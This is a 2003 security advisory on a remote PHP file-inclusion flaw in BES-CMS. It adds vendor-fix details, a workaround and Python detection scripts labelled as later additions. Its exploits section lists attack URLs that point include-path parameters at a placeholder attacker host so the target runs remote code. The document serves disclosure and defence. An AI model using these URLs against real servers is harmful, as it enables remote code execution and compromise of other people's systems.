[SCSA-024] BES-CMS including file vulnerability
======================================================================
Security Corporation Security Advisory [SCSA-024]
BES-CMS including file vulnerability
======================================================================
PROGRAM: BES-CMS
HOMEPAGE: http://bes.h6p.org
VULNERABLE VERSIONS: 0.4 rc3, 0.5 rc3
RISK: MEDIUM/HIGH
IMPACT: Including of file
RELEASE DATE: 2003-12-20
======================================================================
TABLE OF CONTENTS
======================================================================
1..........................................................DESCRIPTION
2..............................................................DETAILS
3.............................................................EXPLOITS
4............................................................SOLUTIONS
5...........................................................WORKAROUND
6..................................................DISCLOSURE TIMELINE
7..............................................................CREDITS
8...........................................................DISCLAIMER
9...........................................................REFERENCES
10............................................................FEEDBACK
1. DESCRIPTION
======================================================================
"Bes-cms is a professional dynamic php website building tool. It was
developed at mokka by a bored programmer. Bes-cms is capable of
creating images galleries, message boards, news sections download
sections contact sections and many more to be added on the
plugin server."
(direct quote from BES-CMS website)
2. DETAILS
======================================================================
- File inclusion:
A vulnerability has been discovered in BES-CMS that allows remote
attackers to cause the script to include arbitrary PHP code
(allowing remote command execution).
In index.inc.php, Members/index.inc.php and Members/root/index.inc.php,
we can see the following code:
----------------------------------------------------
include_once($PATH__Includes."actions_default.php");
----------------------------------------------------
In the Include/functions_folder.php file :
----------------------------------------------------
include($PATH__Includes.'functions_folder_modules.php');
include($PATH__Includes.'functions_folder_plugins.php');
include($PATH__Includes.'functions_folder_files.php');
----------------------------------------------------
In the Include/functions_hacking.php file :
----------------------------------------------------
switch($_GET['itemID'])
{
    case 'usershow':
        include_once("".$PATH__Includes."functions_user.php");
        Show_USer_Details($_GET['user']);
        break;
    [...]
    case 'send_bug':
        if ($UserDetails['LOGGED_IN'] == 'YES')
        {
            global $PATH__Includes;
            include_once("".$PATH__Includes."functions_error.php");
            send_bug_report();
        }
        break;
    [...]
    case 'content_view':
        global $PATH___Includes;
        include_once("".$PATH__Includes."functions_message_docTypes.php");
        Message_Centent_View($Plugin_Path);
        break;
    case 'logger':
        global $PATH__Includes;
        include_once("".$PATH__Includes."functions_users.php");
        Loggin_Message();
        break;
    case 'search':
        global $PATH__Includes;
        include_once("".$PATH__Includes."functions_general.php");
        Display_Search_Results($_POST['search_str']);
        break;
    [...]
----------------------------------------------------
In the Include/functions_message.php file :
----------------------------------------------------
include($PATH__Includes.'functions_message_docTypes.php');
include($PATH__Includes.'functions_message_edit.php');
----------------------------------------------------
And in the Include/Start.php file:
-------------------------------------------
include_once($inc_path."Include/vars.php");
-------------------------------------------
All these files are vulnerable. Every include path begins with a variable
($inc_path or $PATH__Includes) that is never defined in the code of the
file itself, so its value can be defined by an attacker.
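The pattern described above can be searched for mechanically. The following is an added example, not code from the advisory or from BES-CMS: a line-based heuristic that reports include/require statements whose leading path variable has not been assigned earlier in the same file. The function name and both sample files are constructed for illustration; the "fixed" sample is an assumption, not the 0.5 rc4 patch.

```python
import re

# include/require whose path starts with a variable, optionally after an empty
# string literal and a dot, as in include_once("".$PATH__Includes."x.php").
INCLUDE_RE = re.compile(
    r'\b(?:include|require)(?:_once)?\s*\(?\s*(?:(?:""|\'\')\s*\.\s*)?\$(\w+)',
    re.IGNORECASE)
# Plain assignment ($x = ...), excluding comparisons (==) and array arrows (=>).
ASSIGN_RE = re.compile(r'\$(\w+)\s*=(?![=>])')

def find_unset_include_vars(php_source):
    """Return [(line_no, variable)] for includes whose leading path variable
    has no assignment on an earlier line of the same file.
    Heuristic only: it does not follow includes into other files, and a
    'global $x;' declaration is deliberately not counted as a definition."""
    assigned = set()
    findings = []
    for line_no, line in enumerate(php_source.splitlines(), start=1):
        for match in INCLUDE_RE.finditer(line):
            if match.group(1) not in assigned:
                findings.append((line_no, match.group(1)))
        assigned.update(ASSIGN_RE.findall(line))
    return findings

# Constructed sample assembled from the snippets quoted in the advisory.
SAMPLE_VULNERABLE = '''<?php
switch($_GET['itemID'])
{
case 'usershow':
include_once("".$PATH__Includes."functions_user.php");
break;
}
include_once($inc_path."Include/vars.php");
'''

# Constructed sample (assumption): the file sets the path itself before use.
SAMPLE_FIXED = '''<?php
$PATH__Includes = dirname(__FILE__)."/";
include_once($PATH__Includes."actions_default.php");
'''

if __name__ == "__main__":
    for line_no, var in find_unset_include_vars(SAMPLE_VULNERABLE):
        print("line %d: include path starts with unset $%s" % (line_no, var))
```

A finding means the file relies on its includer to set the variable, so it must either define the path itself or not be directly requestable.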
3. EXPLOITS
======================================================================
- File inclusion (if register_globals=ON):
- http://[target]/index.inc.php?PATH_Includes=http://[attacker]/
http://[target]/Members/index.inc.php?PATH_Includes=http://[attacker]/
http://[target]/Members/root/index.inc.php?PATH_Includes=http://[attacker]/
Could include the file : http://[attacker]/actions_default.php
- http://[target]/Include/functions_folder.php?PATH_Includes=
http://[attacker]/
Could include the files : http://[attacker]/functions_folder_modules.php
http://[attacker]/functions_folder_plugins.php
http://[attacker]/functions_folder_files.php
- http://[target]/Include/functions_hacking.php?PATH_Includes=
http://[attacker]/&itemID=usershow
http://[target]/Include/functions_hacking.php?PATH_Includes=
http://[attacker]/&itemID=logger
Could include the file : http://[attacker]/functions_user.php
- http://[target]/Include/functions_hacking.php?PATH_Includes=
http://[attacker]/&itemID=send_bug&UserDetails[LOGGED_IN]=YES
Could include the file : http://[attacker]/functions_error.php
- http://[target]/Include/functions_hacking.php?PATH_Includes=
http://[attacker]/&itemID=content_view
Could include the file : http://[attacker]/functions_message_docTypes.php
- http://[target]/Include/functions_hacking.php?PATH_Includes=
http://[attacker]/&itemID=search
Could include the file : http://[attacker]/functions_general.php
- http://[target]/Include/functions_message.php?PATH_Includes=
http://[attacker]/
Could include the files : http://[attacker]/functions_message_docTypes.php
http://[attacker]/functions_message_edit.php
- http://[target]/Include/Start.php?inc_path=http://[attacker]/
Could include the file : http://[attacker]/Include/vars.php
4. SOLUTIONS
======================================================================
You can find a patch at the following link: http://www.phpsecure.info
The creator was notified and has published a secure version (version 0.5 rc4).
5. WORKAROUND
======================================================================
In index.inc.php, Members/index.inc.php, Members/root/index.inc.php,
Include/functions_folder.php, Include/functions_hacking.php and
Include/functions_message.php simply add the following line as FIRST LINE :
-------------------------------------------
if (isset($_REQUEST["PATH__Includes"])){ die("Patched by phpSecure.info");
}
-------------------------------------------
And at the beginning of the Include/Start.php file, add the following line
as FIRST LINE :
------------------------------------------------------------------------
if (isset($_REQUEST["inc_path"])){ die("Patched by phpSecure.info"); }
------------------------------------------------------------------------
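The condition these guards test can also be checked after the fact in web server access logs. The following is an added example, not part of the original advisory: it flags requests whose query string sets one of the include-path variables and notes whether the value is a remote URL, including percent-encoded ones. The log lines, addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameter names from the advisory: the code uses PATH__Includes and inc_path;
# the example URLs spell the first one PATH_Includes, so all three are watched.
WATCHED = {"PATH__Includes", "PATH_Includes", "inc_path"}
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
REMOTE_RE = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)

def flag_line(log_line):
    """Return (path, param, value, is_remote) for the first watched
    parameter in the request line, or None if there is none."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return None
    target = urlsplit(match.group(1))
    # parse_qsl percent-decodes names and values, so encoded URLs are caught.
    for name, value in parse_qsl(target.query, keep_blank_values=True):
        if name in WATCHED:
            return (target.path, name, value, bool(REMOTE_RE.match(value)))
    return None

def scan(lines):
    """Return the findings for every flagged line, in input order."""
    return [hit for hit in map(flag_line, lines) if hit]

# Constructed sample log lines (documentation addresses and hostnames).
SAMPLE_LOG = [
    '192.0.2.10 - - [20/Dec/2003:10:00:00 +0000] '
    '"GET /index.php?id=news HTTP/1.0" 200 512',
    '198.51.100.7 - - [20/Dec/2003:10:00:05 +0000] '
    '"GET /Include/Start.php?inc_path=http%3A%2F%2Fexample.invalid%2F HTTP/1.0" 200 87',
    '198.51.100.7 - - [20/Dec/2003:10:00:09 +0000] '
    '"GET /Include/functions_hacking.php?PATH__Includes=x/&itemID=search HTTP/1.0" 200 20',
]

if __name__ == "__main__":
    for path, param, value, is_remote in scan(SAMPLE_LOG):
        print(path, param, repr(value), "REMOTE" if is_remote else "local")
```

With register_globals on, the same variables can also arrive in a POST body or a cookie, which a standard access log does not record, so an empty result here does not rule out an attempt.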
6. DISCLOSURE TIMELINE
======================================================================
13/12/2003 Vulnerability discovered
14/12/2003 Vendor notified
15/12/2003 Vendor response
15/12/2003 Security Corporation clients notified
15/12/2003 Started e-mail discussions
20/12/2003 Last e-mail received
20/12/2003 Public disclosure
7. CREDITS
======================================================================
frog-m@n <frog-man@xxxxxxxxxxxxxxxxxxxxxxxx> from
http://www.phpsecure.info is credited with this discovery
8. DISCLAIMER
======================================================================
The information within this paper may change without notice. Use of
this information constitutes acceptance for use in an AS IS condition.
There are NO warranties with regard to this information. In no event
shall the author be liable for any damages whatsoever arising out of
or in connection with the use or spread of this information. Any use
of this information is at the user's own risk.
9. REFERENCES
======================================================================
- Original Version:
http://www.security-corporation.com/advisories-024.html
- French Version:
http://www.security-corporation.com/index.php?id=advisories&a=024-FR
10. FEEDBACK
======================================================================
Please send suggestions, updates, and comments to:
Security Corporation
http://www.security-corporation.com
advisory@xxxxxxxxxxxxxxxxxxxxxxxx